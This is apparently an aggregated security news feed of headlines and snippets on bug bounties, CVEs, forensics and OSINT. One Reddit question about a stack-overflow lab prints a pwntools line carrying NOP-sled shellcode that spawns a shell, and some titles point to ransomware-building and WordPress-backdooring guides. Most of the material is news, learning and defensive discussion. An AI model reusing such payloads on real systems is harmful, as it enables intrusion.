    Hello Hackers and Security community. I'm going to share how I was able to find the bug. Continue reading on Medium »
    ($$$) IDOR via GET Request which can SOLD all User Products
    Hi everyone, Continue reading on Medium »
    Blind-XSS Disappointment
    Blind XSS is a relatively easy bug to find with the availability of tools like XSS-Hunter and Burp collaborator. Continue reading on Medium »
    Misconfiguration OAuth Lead Account Takeover #Part 2
    Here are my bounty bug findings regarding Misconfiguration OAuth Lead Account takeover Part 2 Continue reading on Medium »
    How I managed to make a DDoS attack by exploiting a company’s service — Bug Bounty
    Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to tell you about an event that happened to me while I was… Continue reading on Medium »
    Account Enumeration Hacking Tool Created By Python For Finding Username Of Your Target Websits…
    Hi guys, in this tutorial you will learn how to create a Python script for finding the username of the admin panel of a target WordPress website and… Continue reading on Medium »

    Reversing embedded device bootloader (U-Boot) - p.1 - Shielder
    submitted by /u/smaury
    Put an io_uring on it: Exploiting the Linux Kernel
    submitted by /u/eberkut
    DomainProactive: Security Monitoring for Internet Presence
    submitted by /u/genemcculley
    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    submitted by /u/AlexForster
    Three critical 0-days allow RCE and even physical ignition in APC UPS
    submitted by /u/Subterminal303
    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    submitted by /u/YuvalAvra
    PreAuth RCE in Passcom Cloud Phone Systems found by Kerbit Security Firm.
    submitted by /u/nathanAbejeM

    Ukraine Invasion, Week 2 + more
    Welcome to the 3rd edition of the discursus Protest Analytics newsletter. Continue reading on discursus.io »
    Link to the Bellingcat documentary — Truth in a Post-Truth World
    Sumbubotol.com, November 27, 2019 — Good news today. Sumbubotol.com congratulates Submarine Amsterdam, which succeeded in… Continue reading on Sumbu Botol »

    BHI: The Newest Spectre Vulnerability Affecting Intel and Arm CPUs
    Article URL: https://www.phoronix.com/scan.php?page=news_item&px=BHI-Spectre-Vulnerability Comments URL: https://news.ycombinator.com/item?id=30603762 Points: 5 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://slashdot.org Comments URL: https://news.ycombinator.com/item?id=30601465 Points: 1 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://arstechnica.com/information-technology/2022/03/linux-has-been-bitten-by-its-most-high-severity-vulnerability-in-years/ Comments URL: https://news.ycombinator.com/item?id=30596044 Points: 39 # Comments: 10

    [Security Bulletin] Linux DirtyPipe local privilege escalation vulnerability (CVE-2022-...
    Recently, a Linux local privilege escalation vulnerability known as DirtyPipe surfaced online; any unprivileged local user can exploit it to obtain root privileges. ...

    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    Article URL: https://blog.cloudflare.com/cve-2022-26143/ Comments URL: https://news.ycombinator.com/item?id=30602912 Points: 4 # Comments: 0
    Security advisory for the regex crate (CVE-2022-24713)
    Article URL: https://blog.rust-lang.org/2022/03/08/cve-2022-24713.html Comments URL: https://news.ycombinator.com/item?id=30600044 Points: 4 # Comments: 0

    Extended Attributes and TCC on macOS
    This blog post will describe how Transparency, Consent, and Control (TCC) affects extended attributes on macOS. Continue reading on Medium »

    What is life like as a female digital forensic investigator?
    I am just curious about how females go along in this field as I am currently doing a BSc in Business Management and Information Systems and want to be a digital forensic investigator. submitted by /u/SkillKiller3010
    Internship Preparation Help for State Forensic Agency
    Hey everybody, I was lucky enough to be considered for a digital forensics internship position with my state's primary forensic agency. I've worked practice cases at my university using FTK and AXIOM, and I have research experience making a forensic image and working a case from beginning to end. Could anyone provide any tips to help me prepare for the interview? I have an incredible opportunity, and I want to make the most of it that I can. submitted by /u/Tuuin

    SecWiki News 2022-03-08 Review
    Reverse analysis and reconstruction of user-mode APIs by ourren; Symbols and interpretation by ourren; The ROME renovation plan by ourren; How my self-hosted Gitea + Drone instance was hijacked for crypto-mining by ourren; Investigation of in-the-wild attacks on container security by ourren; ATT&CK in-the-wild data analysis by Avenger. For more of the latest articles, visit SecWiki

    Expanding the Hound: Introducing Plaintext Field to Compromised Accounts
    Introduction When doing an Internal Penetration Test, it is not uncommon to run BloodHound at one point or another. In case you are not familiar with BloodHound, it’s a tool that automatically fires off a bunch of LDAP queries and Windows API calls to collect various data in an Active Directory environment. Data can range... The post Expanding the Hound: Introducing Plaintext Field to Compromised Accounts appeared first on TrustedSec.

    Ways to Mitigate Software Supply Chain Attacks in 2022
    A supply chain attack, also known as a value-chain attack or a third-party attack, occurs when someone attacks an organization’s system… Continue reading on InfoSec Write-ups »

    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    We disclosed several GKE Autopilot vulnerabilities and attack techniques to Google. The issues are now fixed – we provide a technical analysis. The post Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities appeared first on Unit42.

    New-generation banking trojan SharkBot is spreading through the Play Store
    SharkBot is a banking trojan that can bypass multi-factor authentication mechanisms to steal bank account credentials.
    FreeBuf Morning Report | Google's motion to dismiss a data breach lawsuit is rejected; leaked NVIDIA data is being used to build malware
    Alphabet shareholders are suing Google for deliberately concealing a security vulnerability that led to the leak of users' private data. In October 2018, US media reported that the incident exposed the personal data of nearly 500,000 Google+ users.
    Hackers worldwide are drawn into the Ukraine-Russia turmoil: the digital cyber war behind it deserves reflection
    This is the first global-scale hacker cyber war of the digital age, with multiple nation-state hacking forces joining in, taking nations as their targets and attacking core critical infrastructure! [Introduction] On February 24, between Ukraine and Russia
    Investigation of in-the-wild attacks on container security
    Cloud-native security companies are springing up everywhere, and the major cloud vendors are actively building their own cloud-native security capabilities to protect their customers' assets in the cloud.
    Take a look! 23 major cybercrime statistics for 2021-2022
    Cybercrime has been on the rise since the COVID-19 pandemic. Cybersecurity-focused Ruicheng Information has compiled the most notable cybercrime statistics of 2021 along with industry experts' predictions of internet security trends for 2022.
    Join the CIS 2021 Spring Edition livestream on March 9 and grab your share of a 10,000-yuan shower of red envelopes!
    At 9:30 a.m. on March 9-10, tune in to the CIS 2021 Spring Edition official website, where excellent talks and prize-winning activities await you.
    Reflections on "data-centric" data security practice
    From traditional industries such as telecom operators, energy, healthcare and finance to the emerging internet industry, a wave of data security development has swept through.
    White Hat Interview | Hello everyone, I'm A Yang, a full-time bug hunter!
    "Create with dreams and courage; prove with faith and effort." Hello everyone, I'm A Yang. I entered the security community by teaching myself penetration testing and am now a full-time bug hunter on The loner security team, specializing in business-logic vulnerabilities, which has earned me generous bounty rewards.
    Firefox hit by two more 0-day vulnerabilities; upgrade as soon as possible
    Mozilla recently released an out-of-band security update for the Firefox web browser that fixes two high-impact security vulnerabilities.
    Hacker group breaches Russian media and broadcasts footage of the war in Ukraine
    Russian media outlets suffered cyberattacks and displayed footage of the war inside Ukraine.
    Guide to using Metasploit locally
    When working on projects, starting a virtual machine every time is inconvenient, and on low-spec machines running too many of them in the background causes lag. Installing it locally is simply faster and more convenient and improves efficiency. It can also be deployed on a VPS or similar, which is convenient for internal network penetration testing.
    FBI: 52 US critical infrastructure entities have been breached
    As of January 2022, the FBI has determined that at least 52 critical infrastructure entities across 10 critical infrastructure sectors were compromised, spanning critical manufacturing, energy, financial services, government and information technology.
    Samsung confirms hackers stole Galaxy device source code
    On Monday, Samsung confirmed that its network was breached by hackers and that confidential information, including source code for Galaxy phones, was stolen.
    Coinbase is blocking more than 25,000 Russia-linked cryptocurrency addresses
    On March 7, the popular cryptocurrency exchange Coinbase announced that it is blocking more than 25,000 cryptocurrency addresses linked to Russian individuals and entities.

    Movies from 1940 until last weekend! Busy site so starts slow(That’s what I’m blaming it on) lol
    submitted by /u/Yankeeslv [link] [comments]

    Courtesy of Republic of Bulgaria! - Part Two
    An image is worth a thousand words. Related posts: Courtesy of Republic of Bulgaria!; A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis; An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis; What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To the


    Pentesting toolkit: all you need to know
    Red Teams use a comprehensive and complete toolkit to expose different platforms and get accurate results when reporting failures, data… Continue reading on Medium »
    Phishing Tools
    Phishing is one of the most serious threats in the digital world. Phishing fools people. A phishing email always looks the same as the… Continue reading on Medium »

    Why do ISPs ask for your SSN when signing up for their services?
    When I was signing up for Spectrum they asked for my SSN, and I gave it to them. How scared should I be? submitted by /u/Empty-Ad1458 [link] [comments]
    What Windows based non Github program would allow me to brute force a TrueCrypt volume?
    Years ago I made some TrueCrypt volumes and forgot about them. I have now found them and forgotten some of the password. I know what the first half was and what some of the second half was, but don't know where I put special characters or capital letters. I'm not good with GitHub, so is there a non-GitHub program that will let me enter the known parts, where I can tell it to try every possible character in certain spaces, and only the lowercase and uppercase forms of certain letters, i.e. m or M? submitted by /u/TerribleFruit [link] [comments]
    How to Fill My Knowledge Gaps as Quickly as Possible?
    I've been fascinated with cyber/net sec since I was a teenager who wanted to be a '1337 hax0r' (doesn't every nerdy teen wanna be one?). However, I went into Web Development. As I went I did have to learn about defensive coding techniques against SQL injection, path escalation, etc. I worked for financial, insurance and ISO270001 companies and thought I had a reasonable grasp of things since I'd done some sysadmin along the way installing Fail2Ban, Tripwire, etc. I even have the compact red, blue and purple team reference books and Parrot Sec on one partition I occasionally used to play with sec tools and have a Shodan account. I knew about Metasploit but had only done one tutorial. Fast forward to now: I need a career change after dev-burnout. I look into cyber sec and BOOM! Suddenly I see a ton of shit I've never seen before: SIEM? Mitre Att&ck? IoT Bots (have my ESP32 climate monitoring boards become an attack vector?!) TTPs? What on earth happened in the past few years that I missed? I barely recognise the industry anymore. I lifted my finger off the pulse for a few seconds and suddenly it's a different beast entirely. Can some kind soul point me to a good YouTube channel, guide, book, (free/cheap) course that will fill in the gaps I've missed the past few years? submitted by /u/adminsuckdonkeydick [link] [comments]
    Can exact ip addresses be spoofed?
    Recently I noticed activity that I didn't really remember doing on an account, but it was from my exact IP address. I have a limited understanding of IP addresses, but spoofing a specific address isn't really possible, as you won't receive anything from the site you are trying to reach, correct? A proxy needs to be used, which is already a set "spoofed" IP, right? submitted by /u/SaucyBoiTybalt [link] [comments]
    How do I Remove FireEye from a Host?
    Does anyone know where I can find instructions or documentation about removing FireEye from a host? Specifically what registry keys should be deleted? Does anyone have experience with this request? Thank you for taking a look! submitted by /u/ELcup [link] [comments]
    Cyberstalking & Hacking
    Hey r/AskNetsec, I'm getting hacked by two lecturers at my university. I know this and do not want to call the police as I have no evidence of them hacking me. I'm a student and have no money to pay for a digital forensics investigation to be done. How do I stop them from hacking me. They're hacking all my devices and families devices. They also are hacking my email account using a cookie stealer. I have no idea how to stop this and this has become cyberstalking. I'm a South African, I cannot contact the FBI or foreign charity organisations either. I don't want to involve the police since, all they have to do is stop hacking me, then I could get prosecuted for falsely accusing someone of committing a crime. Any advice or help with the situation would be appreciated. Best regards, Anon submitted by /u/Independent_Art_9954 [link] [comments]
    Ask for help, I think I was attacked by phishing
    A few days ago, I happened to see a message from Facebook. I went through the link without thinking and since then I have received countless spam emails, and several times a day I have been notified of membership registrations and logouts for sites that I never need to log in to. After that, I found out that something was wrong. Perhaps I was attacked by phishing. The Facebook site at the link I entered was a well-made site, very similar to the normal site. In addition, there was no doubt at all, because it was possible to log in, search, and view news articles and content within the site. Banners, search windows, newsstand windows, login windows, and footers at the bottom were configured in a very similar way. As a result, I had no choice but to renew all my personal contact information and e-mail addresses. I had only ever encountered the kind of writing that tells you to be careful of phishing sites, but I feel quite bad that I'm actually being attacked. Beyond feeling bad, it is creepy that other people view and use my personal information without permission. In order to prevent access to phishing sites and prevent personal information from being leaked, it is necessary to check whether the domain is normal when receiving e-mails or text messages containing links. So I want to ask: what is a way to verify that it is a normal domain when receiving mail and text messages containing links? Is there a service or system that determines whether a link to a web page is normal or dangerous when I enter a suspicious link into a search box? submitted by /u/Late_Ice_9288 [link] [comments]
    Introduction to Networks materials
    Hey Everyone, I have a new mentee who wants to learn networking. She is completely from a non-IT background. Could you please suggest some good basic references/trainings that she can learn from? I know of some CCNA and CompTIA instructors who start from quite basic material, but wanted to check if there is some other non-certification course that she can start with. submitted by /u/wackynerd14 [link] [comments]
    Potential DNS Attacks
    As this is a very hot topic, I'd like to preface this by saying I am trying to keep this 100% politics-free and strictly technology-related. That said, I read earlier today that there's a possibility of Russia forcing the use of their own DNS servers as of March 11: https://www.thetechoutlook.com/news/new-release/software-apps/breaking-news-russia-is-preparing-to-disconnect-from-the-global-internet I do not know the validity of the news itself, so I'm hoping to keep this strictly on the technical aspect in case the order does happen. If we have vendors that hold offices in Russia and can access our VPN (let's also assume we do not have control over our vendors' offices): could this new order introduce any additional risks to our network? Our VPN should deny all requests with an invalid SSL certificate, but does anyone think the order could introduce any additional risk of DNS attacks (at least directly)? Assuming users do not ignore SSL warnings, would this be any more of a concern than usual? Thanks in advance! submitted by /u/HPCer [link] [comments]

    GitHub - klezVirus/SysWhispers3: SysWhispers on Steroids - AV/EDR evasion via direct system calls.
    submitted by /u/dmchell [link] [comments]
    PROPHET SPIDER Exploits Citrix ShareFile Remote Code Execution Vulnerability CVE-2021-22941 to Deliver Webshell
    submitted by /u/dmchell [link] [comments]

    Palined Google OD search went down
    submitted by /u/Raven_Claw7621 [link] [comments]

    A new speed milestone for Chrome
    Every day, billions of people around the world turn to Chrome to get things done quickly on their devices, whether shopping for a new pair of headphones or pulling together a sales report for work. Nothing is more frustrating than having a slow experience while browsing the web. That's why Chrome has always been focused on building the fastest possible browser since its launch in 2008, without compromising on feature functionality or security. In our first The Fast and the Curious post of 2022, we are thrilled to celebrate how in the M99 release of Chrome we were able to substantially increase the speed of Chrome across all major platforms. We go deep on every platform where Chrome runs to provide the fastest possible experience. We're excited to announce that in M99, Chrome on Mac has ach…

    PHOTON
    (LET’S EXPLORE WEBSITE) Continue reading on Medium »
    Some critical vulnerabilities found with passive analysis on bug bounty programs explained
    This post describes three vulnerabilities found on paid bounty programs, along with an overview of how each was found and the performed… Continue reading on InfoSec Write-ups »
    March OSINT Musings
    In light of the current events occurring in Ukraine now would be a good time to: Continue reading on Medium »

    Critical cross-account vulnerability in Microsoft Azure automation service
    Article URL: https://orca.security/resources/blog/autowarp-microsoft-azure-automation-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30589845 Points: 213 # Comments: 41
    The Dirty Pipe Vulnerability
    Article URL: https://dirtypipe.cm4all.com/ Comments URL: https://news.ycombinator.com/item?id=30586740 Points: 673 # Comments: 232

    Web Cache Poisoning leads to Stored XSS
    Glassdoor disclosed a bug submitted by bombon: https://hackerone.com/reports/1424094 - Bounty: $2000

    SecWiki News 2022-03-07 Review
    A tour of excellent ATT&CK projects by Avenger; SecWiki Weekly (Issue 418) by ourren; Talks on software engineering capability (video & PPT) by ourren. For more of the latest articles, visit SecWiki

    Web fuzzing tool written in python
    soon Continue reading on Medium »

    Critical Cross-Account Vulnerability Found in Microsoft Azure Automation Service
    submitted by /u/FoShizzleMyWeasle [link] [comments]
    The Dirty Pipe Vulnerability [CVE-2022-0847]
    submitted by /u/moviuro [link] [comments]
    2021 Year In Review - Tools, TTPs, and more!
    submitted by /u/TheDFIRReport [link] [comments]

    Computer Forensics and Investigation Project
    Hi Team, I need suggestions for any websites where I can find a reference scenario of a cybercrime where you have to do computer forensics on a victim's PC. For example, a hacking incident, where you have to verify or investigate how he/she was hacked. The report shall include the creation of a hypothetical scenario of a crime committed involving the said electronic device, as well as a detailed description of the forensic examination, tools used, procedure, and findings, evidenced with the necessary screenshots, and ensure all screenshots have the necessary verifiable names. This is a school project for my cybersecurity program and it is only my term 1. Thank you so much! submitted by /u/bankshot15 [link] [comments]
    Avoid modifying the smartphone evidence
    To present forensic analysis in court, we can't modify smartphone evidence. Although I have put the Android phone in airplane mode, I still worry about modifying smartphone data during the Cellebrite UFED phone extraction. How do I avoid tampering with evidence during extraction? For Linux image analysis, I can mount as read-only; how about a smartphone? submitted by /u/cyberfo [link] [comments]
    How do I get Laptop serial number from E01 image?
    Yep... someone messed up the chain of custody forms. submitted by /u/MasterBet [link] [comments]
    DNS poisoning or DNS hijacking
    We encounter a lot of packets with a small TTL in our pcap files. Is this a symptom of a DNS poisoning attack, or DNS hijacking, or another DNS attack, like DDoS? submitted by /u/cyberfo [link] [comments]
    how to detect C2 communication from log
    How do I detect C2 communication from logs? We have a method to detect beaconing, but now have difficulty in detecting command and control commands, and we have no clue. Does anyone know how to detect it through Splunk logs? submitted by /u/cyberfo [link] [comments]

    [THM] Bounty Hacker Writeup
    No content preview
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    No content preview
    B̶a̶k̶e̶ Hack your cake!
    No content preview
    [THM] Brooklyn Nine Nine Writeup
    No content preview
    All about Account Takeover
    No content preview
    Agent Sudo | TryHackMe Walkthrough
    No content preview
    Methods to Bypass two-factor Authentication
    No content preview
    Reset password Token led to account takeover
    No content preview
    How to Make Ransomware with Python
    No content preview

    Implementation and application of zero-trust-based remote work security technology
    A zero-trust-based remote work security solution can free work from dependence on the host and easily ensure business continuity for remote work.
    MIIT releases the "Guidelines for Building the Standard System for Internet of Vehicles Cybersecurity and Data Security"
    By the end of 2023, an initial standard system for Internet of Vehicles cybersecurity and data security will be established; by 2025, a relatively complete standard system for Internet of Vehicles cybersecurity and data security will be in place.
    Unveiling the APT36 group's CapraRAT malware
    We will continue to introduce notorious international APT groups, so that we can better understand and guard against their malicious software.
    A summary of cybersecurity vulnerability analysis
    Starting from the vulnerability points, we analyze the vulnerabilities and learn some approaches to white-box vulnerability discovery from them.
    CISA adds 95 new vulnerabilities to its Known Exploited Vulnerabilities catalog
    The US Cybersecurity and Infrastructure Security Agency (CISA) this week added 95 new security vulnerabilities to its exploited vulnerabilities catalog, bringing the total number of exploitable vulnerabilities to 478.
    It's 2022; are password managers still secure?
    This article revisits password managers and answers several important questions about them.


    Using Google hacking to search Telegram channels
    I was looking for pro-Putin channels on Telegram, using Google Dorks. I thought this was also a practical example of using Google hacking… Continue reading on Medium »
    10 OSINT Tools Hackers Need to Know About
    Open source intelligence is a vital task for the red team and blue team alike. Here are some of the most useful OSINT tools. Continue reading on Medium »
    Send Google Alert To Slack
    Automatic Free Crawler By Google Continue reading on Medium »
    Final Recon — OSINT Tool for All-In-One Web Reconnaissance
    Final Recon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be… Continue reading on Medium »

    help with making money
    Hey everyone, I would like to join the security game. I have a background in programming and how computers and software work. What is the fastest way to make money in the security field? I'm here not only for money, I really like this field, but I need to make money fast; I have bills to pay and I can't get a job. I appreciate any help and guidance. submitted by /u/timet0fly [link] [comments]
    AlienVault OSSIM - Step by Step Tuning after Installation
    Hi there, I'm interested in testing this SIEM for education purposes. I downloaded the latest version from the official site and installed it on my VMware. But I stumbled upon the fact that I do not fully understand how best to configure everything. I did not find any deep step-by-step documentation on the official portal, and most likely I can miss a lot through undetailed documentation. Do I understand correctly that Suricata works out of the box? I don't need to install an agent on a Windows host? When I installed HIDS on my Windows host, I had a lot of weird events where the destination IP is displayed as 0.0.0.0. And I don't even know how to make a rule so that these events are not reflected. I googled and other people had such problems and there is no solution. For those who work a lot with this SIEM, perhaps from your experience you could share recommendations on what to do after installing this SIEM. I also haven't fully figured out how to run FIM. submitted by /u/athanielx [link] [comments]
    Is it possible to be hacked by private networks/hidden SSIDS near your area?
    I believe my neighbors are watching me using private networks. I have an app that shows hidden SSIDs. I think they are using these networks to see and listen to what I'm doing on my devices. submitted by /u/AshuraSenkuu [link] [comments]
    Potential drive-by 0-click 0-day on chrome
    There is an ongoing bug in Chrome that allows attackers to download files in the background onto the victim's machine without triggering any GUI updates. I first experienced this about two months ago when I was trying to close the browser, only to be interrupted by a Chrome prompt informing me that there were ongoing downloads in the background that weren't started by me and displayed no sign of the downloading process in Chrome's GUI. I was a bit alarmed but I didn't pay it too much attention. Then I got curious when yesterday I had the same experience again; this time obviously I clicked 'continue downloads' and was taken to the Chrome download page, where I found that Chrome had intercepted and flagged a 'malicious file' and was offering me to either 'keep' or 'discard' said file. Regrettably …

    Frelatage: A new Coverage-Based Python fuzzing library
    Hello everyone! I am a 21-year-old French cybersecurity enthusiast and I would like to share with you Frelatage, which is a tool I wrote! It is a coverage-based Python fuzzing library which can be used to fuzz Python code. The development of Frelatage was inspired by various other fuzzers, including AFL/AFL++, Atheris and PyFuzzer. The main purpose of the project is to take advantage of the best features of these fuzzers and gather them together into a new tool in order to efficiently fuzz Python applications. Please note that the project is still in early alpha, and its development is very active, so any advice or suggestion is welcome! Install: https://github.com/Rog3rSm1th/Frelatage https://i.redd.it/m88potyk9tl81.gif submitted by /u/FrenchFuzzer [link] [comments]
    Shellcode Buff Overflow Question
    As I was going through protostar Phoenix Stack overflows I came across something on the Stack-Five exercise that I don't quite understand on amd64. https://exploit.education/phoenix/stack-five/ Basically I can get the exploit to work when the nop sled is 80 characters long but when I have it 88 characters long I get a seg fault. This Works t.sendline('\x90'*80 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*29 + pwn.p64(0x7fffffffe5d0)) ​ This gives a segfault t.sendline('\x90'*88 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*21 + pwn.p64(0x7fffffffe5d0)) ​ Does anyone know why the second one doesn't work? submitted by /u/Jasonsaccount [link] [comments]

    Backdooring WordPress using PyShell
    submitted by /u/jonas02 [link] [comments]
    Escaping privileged containers for fun.
    submitted by /u/JordyZomer [link] [comments]

    Going beyond the surface: Vulns that pay well
    These days bug bounty hunters have been finding many low hanging fruits and a lot of them want to go beyond those bugs. This blog is for… Continue reading on InfoSec Write-ups »
    All About Access Control Part-1
    Hello, I am Manan Aggarwal, a BTech CSE student, here to present the blog All About Access Control Part-1… Continue reading on Medium »
    A short story of IDOR for your perspective
    Hi all, I hope all is well. In this story, I’ll explain an idor bug which I found in a private bug bounty program. This story will very… Continue reading on Medium »
    SSRFire - an automated SSRF finder
    An automated SSRF finder. Just give the domain name and your server and chill! ;) It also has options to find XSS and open redirects. Continue reading on Medium »
    WhatsApp Bug Bounty: Bypassing biometric authentication using voip
    Bypassing biometric authentication just by making a call and accessing the app completely. Continue reading on InfoSec Write-ups »
    HOF In 3 Minute Using Low Hanging Fruits
    Hello, security guys and hackers. In this write-up I am going to tell you about Continue reading on Medium »
    Response Manipulation leads to Account Takeover
    This is a short story about my recent bug hunting on a private program. This program mainly relies on OTP to check user’s authentication… Continue reading on Techiepedia »
    Weak Registration Implementation
    Let us learn some P4 bugs Continue reading on Medium »

    SecWiki News 2022-03-06 Review
    No news updated yet today. For more of the latest articles, visit SecWiki

    Unrecoverable and recoverable Windows files
    In my forensic image, some deleted files I can recover and some I cannot. How does EnCase determine internally which files are not recoverable? For data carving, how does EnCase retrieve those files internally; does it use the same techniques as recovering deleted files? Thanks. submitted by /u/cyberfo [link] [comments]
    X-Ways Linux image analysis
    In X-Ways, if I browse the root directory of the image, I find free space, idle space and slack space. Can anyone explain the difference among these three spaces? In the filter attributes there are SUID/SGID, symlink and special file. I thought SUID files are special files; what are the special files X-Ways refers to? Does symlink mean hard link or soft link? submitted by /u/cyberfo [link] [comments]
    Physical acquisition on unrootable phone?
    Hi all. I'm an intern in computer forensics and I'm trying to perform a physical acquisition on an Oppo phone which is unfortunately unrootable as far as I know. I have Cellebrite UFED and MobilEdit, but both of them require rooted devices. Any advice for this case? Tysm submitted by /u/juneflorence [link] [comments]

    [Cullinan #28] Add RPO and SSJI
    This is Cullinan log #28. This time RPO and SSJI were added, and some existing entries were revised. Add Relative Path Overwrite (RPO) Add Server-Side Javascript Injection (SSJI) Update SSRF (Add URL: Prefix) Update WebSocket Connection Smuggling (Add https payload) Now I think it's time to tackle a big task I have been putting off for a while. Next, I plan to thoroughly clean up the existing XSS posts and… update them 😅

    Evading Network Defense with Protocol Manipulation
    Signature-based intrusion detection or prevention systems detect malicious activity through a predefined signature. If a Red Team… Continue reading on Medium »

    CVE-2022-25312: An XML external entity (XXE) injection vulnerability exists I
    Article URL: https://lists.apache.org/list?announce@apache.org:2022-3 Comments URL: https://news.ycombinator.com/item?id=30577267 Points: 3 # Comments: 0

    The (Mis)Use of Artifact Categories, pt II
    My previous post on this topic presented my thoughts on how the concept of "artifact categories" were being misused. My engagement with artifact categories goes back to 2013, when Corey Harrell implemented his thoughts on categories via auto_rip. I saw, and continue to see, the value in identifying artifact categories, but as I alluded to in my previous post, it really seems that the categories are being misused. Where the artifacts should be viewed as providing an indication of the categories and requiring further analysis (including, but not limited to the population of artifact constellations), instead, the artifacts are often misinterpreted as being emphatic statements of the event or condition occurring. For example, while an entry in the ShimCache or AmCache.hve file should indicate …
    DFIR Reporting
    A request that's been pretty consistent within the industry over time has had to do with reporting. I'd see a request, some responses, someone might ask for a template, and then the exchange would die off...I assumed that it had moved to DMs or offline. Then you'd see the discussion pop up again later, in some other forum. I get it...writing is hard. I have the benefit of having had to write throughout my career, but also of putting intentional, dedicated effort into DFIR reporting, in that I had been very purposeful in seeking feedback from my boss, and incorporating that feedback into report writing. I was able to get to the point of having reports approved with minimal (if any) changes pretty quickly.  As a result, in 2014, Windows Forensic Analysis Toolkit 4/e was published, and in thi…

    PSA: reddit appears to be removing posts/comments containing *.ru URLs
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]


    Big Collection of 720p Movies, solid speeds, haven't explored all the directories, so I'm marking NSFW just in case.
    submitted by /u/SatansMoisture [link] [comments]
    Classic TV: Various video qualities, decent speeds
    submitted by /u/SatansMoisture [link] [comments]

    A Detailed Guide on Wfuzz
    Introduction Many tools have been developed that create an HTTP request and allow a user to modify their contents. Fuzzing works the same way. A The post A Detailed Guide on Wfuzz appeared first on Hacking Articles.

    webOS Revisited - Even More Mistaken Identities · The Recurity Lablog
    submitted by /u/addelindh [link] [comments]

    Question about protecting my data while traveling.
    I'm traveling a lot this week and was just wondering what kind of VPN you guys use while traveling, and any other security measures you may have :) submitted by /u/Savage-shredder [link] [comments]
    Good US based infosec recruiters?
    I never thought I would say this, normally being on the hiring side, but has anyone had positive experience for US-based boutique infosec recruiters that they would recommend? I’ve found several listed in CISO magazine and such but don’t know if any are particularly clue-full. Public or DM is fine, thanks! submitted by /u/venerable4bede [link] [comments]

    Cloudflare WAF bypass via Origin IP
    Cloudflare supports more than 16 million Internet properties and is now one of the most popular WAFs (Web Application Firewalls). A year… Continue reading on Medium »
    Bug Bounty: Open Xmlrpc.php vulnerability on WordPress site.
    what is Xml-RPC? Continue reading on Medium »
  • Open

    SecWiki News 2022-03-05 Review
    Efficiently mining deserialization vulnerabilities: a GadgetInspector rework by ourren; JS security: AST obfuscation by ourren; Notes on developing a security gateway based on OpenResty by ourren; For more recent articles, visit SecWiki
  • Open

    How to collect a forensic image of an ESXi host that has been infected with ransomware?
    How to collect a forensic image of an ESXi host that has been infected with ransomware? submitted by /u/rvndomus3r2019 [link] [comments]
    Copying Hard Drive
    I am sending a hard drive I own into Cyber Forensics. If possible, I am looking for software advice to copy the hard drive before sending it in to experts. Additionally, if you have advice for transferring the files from the software to a type of hardware, I would appreciate it. Thanks. submitted by /u/Odd-Switch-1658 [link] [comments]
  • Open

    UK’s vulnerability to corruption uncovered amid slow sanctions response
    Article URL: https://www.theguardian.com/commentisfree/2022/mar/05/uks-vulnerability-to-corruption-uncovered-amid-slow-sanctions-response Comments URL: https://news.ycombinator.com/item?id=30566774 Points: 9 # Comments: 0
  • Open

    Plugins for Persistence (Sublime Text & VS Code)
    submitted by /u/hanbei-undying [link] [comments]
  • Open

    unclaimed subdomain special.rkeeper.ru to takeover from tilda.cc
    Mail.ru disclosed a bug submitted by mainteemoforfun: https://hackerone.com/reports/1045644
  • Open

    FreeBuf Morning Report | Credentials of 71,000 Nvidia employees leaked; CPPCC member proposes setting up a cybersecurity and data protection service window
    Nvidia has released a report acknowledging that attackers stole employee passwords and undisclosed Nvidia proprietary information from its systems.
  • Open

    Expat library: libexpat 2.4.7 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_7/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30564782 Points: 1 # Comments: 0
  • Open

    Open source intelligence: what can we find from photographs?
    Tryhackme: Searchlight — IMINT — Part 2 Continue reading on Medium »

  • Open

    Misinformation, Disinformation and Subterfuge, Part One:
    How I triggered a weaponized Fake-Left Troll Farm meant to harass, target, defame and deplatform prominent Disinformation researchers. Continue reading on Medium »
    Maltego Basics: Building a Network Diagram
    This post is a step-by-step guide to create a network diagram in Maltego. Continue reading on Medium »
    The OSINT Toolkit!
    Baidu Maps http://map.baidu.com/ Continue reading on System Weakness »
    OSINT: Digital “influencer” arrested after being identified doing dance videos
    Imagine doing your trending dance on TikoTeko and getting arrested right afterwards? Well, that is exactly what happened. Continue reading on Medium »
  • Open

    The perils of the “real” client IP [or the many ways to use X-Forwarded-For incorrectly]
    submitted by /u/yesyoucantrip [link] [comments]
    A Backdoor Lockpick : Reversing Phicomm’s Backdoor Protocols
    submitted by /u/stargravy [link] [comments]
    Hacking Hadoukens: Reverse Engineering a Street Fighter Two Cabinet
    submitted by /u/wrongbaud [link] [comments]
    ICS & OT Risk and Vulnerability Report
    submitted by /u/h4ck3dit [link] [comments]
    Finding an Authorization Bypass on my Own Website - SQL Injection in a Parameterized Query
    submitted by /u/mdulin2 [link] [comments]
    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    submitted by /u/YuvalAvra [link] [comments]
  • Open

